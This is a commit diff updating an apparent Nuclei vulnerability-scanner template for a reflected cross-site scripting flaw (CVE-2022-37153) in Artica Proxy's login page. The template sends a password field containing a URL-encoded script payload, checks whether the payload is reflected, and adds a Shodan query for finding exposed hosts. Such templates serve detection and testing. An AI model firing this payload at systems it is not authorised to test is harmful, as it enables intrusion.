Update CVE-2022-37153.yaml

patch-1
Ritik Chaddha 2022-08-25 12:57:10 +05:30 committed by GitHub
parent 4e62832dc6
commit 02aa41d02a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 19 additions and 10 deletions

View File

@ -1,18 +1,20 @@
id: CVE-2022-37153
info:
name: Artica Proxy - Reflected Cross Site Scripting
name: Artica Proxy - Cross Site Scripting
author: arafatansari
severity: medium
description: |
An issue was discovered in Artica Proxy 4.30.000000. There is a XSS vulnerability via the password parameter in /fw.login.php.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37153
- https://github.com/Fjowel/CVE-2022-37153
- https://nvd.nist.gov/vuln/detail/CVE-2022-37153
classification:
cve-id: CVE-2022-37153
metadata:
verified: true
shodan-query: http.html:"Artica"
verified: "true"
tags: xss,cve,2022
tags: cve,cve2022,xss,artica
requests:
- raw:
@ -21,15 +23,22 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
userfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Password" value="admin"><script>alert(document.domain)</script>'
- 'Artica Web'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
- type: word
words:
- '"><script>alert(1)</script>'